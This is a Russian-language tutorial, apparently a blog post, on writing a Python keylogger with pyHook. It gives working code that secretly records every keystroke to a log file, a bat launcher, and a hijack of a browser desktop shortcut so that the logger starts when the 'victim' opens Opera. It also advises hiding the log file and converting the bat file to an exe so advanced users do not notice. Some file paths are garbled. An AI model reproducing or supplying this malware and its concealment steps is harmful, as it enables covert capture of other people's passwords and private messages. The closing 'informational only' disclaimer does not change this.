Кейлоггер (клавиатурный шпион) – небольшая программа, главным назначением которой является скрытый мониторинг нажатий клавиш на клавиатуре и ведение журнала этих нажатий.
Для создания кейлоггера нам потребуется:
1) операционная система: Windows или MacOs.
2) установленный на целевой машине Python, а также специальные библиотеки.
Для начала необходимо скачать и установить https://www.python.org После установки Python вам необходимо установить модули «pyHook» и «pywin32». На этом https://www.lfd.uci.edu/~gohlke/pythonlibs/#pyhook вы найдете 32- и 64-битные версии для Windows и других ОС. Скачайте «PYhook» и «pyWin32» в соответствии с установленной вами версией Python.
После загрузки установите и откройте меню IDLE (Python GUI) из меню «Пуск».
Зайдите в меню «Файл» и нажмите на пункте «Новый Файл». После чего вставьте код кейлоггера:
import pyHook, pythoncom, sys, logging
file_log = 'C:\\keyloggerlog.txt'
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format='% (message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Сохраните его, назвав файл Keylogger.pyw. Только не сохраняйте файл в корневом каталоге C:, где для копирования и удаления файлов нужны права администратора. Создайте новую папку на диске C: или в другом месте, где вам не нужны права администратора для копирования файлов и сохраните Keylogger.pyw там.
В качестве выходного файла отчета «file_log =« C:keyloggerlog.txt » вы можете выбрать любое место, но лучше, конечно, какое-то скрытое место на жестком диске. В этом примере я буду сохранять файл отчета на диск в корневой каталог C:.
Кейлоггер готов. Теперь надо сделать так, чтобы кейлоггер запускался скрыто от пользователя и автоматически с загрузкой Windows. Реализовать это можно по-разному. Попробуем сделать это с помощью bat-файла, привязав запуск кейлоггера к какой-нибудь программе или прописав в автозагрузку.
Для начала создайте bat-файл. Для этого скопируйте и вставьте в блокнот следующий код:
@echo off
start "" "C:\keyloggerkeylogger.pyw"
start "" "C:\Program Files\Operalauncher.exe"
В первой строке необходимо вписать путь к файлу keylogger.pyw. Во второй строке вы должны ввести путь к программе, который обычно использует пользователь (в моем случае – браузер Opera).
После редактирования сохраните файл в расширении .bat (в моем случае logger.bat) в каком-нибудь скрытом месте на компьютере (в моем случае в «C:keylogger.bat»).
Теперь идем на рабочий стол и выбираем ярлык часто используемой программы (в моем случае – это браузер Opera). Правым кликом мышки вызываем контекстное меню и заходим в свойства ярлыка. В поле «Объект» вводим путь к bat-файлу кейлоггера «C:keyloggerlogger.bat».
После внесения изменений изменится и иконка ярлыка. Но это легко решается на вкладке свойстве (смотрите скрин выше).
Теперь, когда жертва откроет браузер Opera, автоматически запустится bat-файл, т.е. наш кейлоггер. С этого момента все нажатия на клавиатуре будут сохраняться в файл keyloggerlog.txt. Для остановки работы кейлоггера зайдите в диспетчер задач и закройте процесс.
Данный метод имеет одно «но». Каждый раз при запуске кейлоггера будет появляться окно командной строки. У людей далеких от компьютера это не вызовет подозрений, а вот продвинутый пользователь может понять, в чем здесь дело. Скрыть окно командной строки можно с помощью конвертера bat в exe.
Данный материал носит исключительно информационный характер.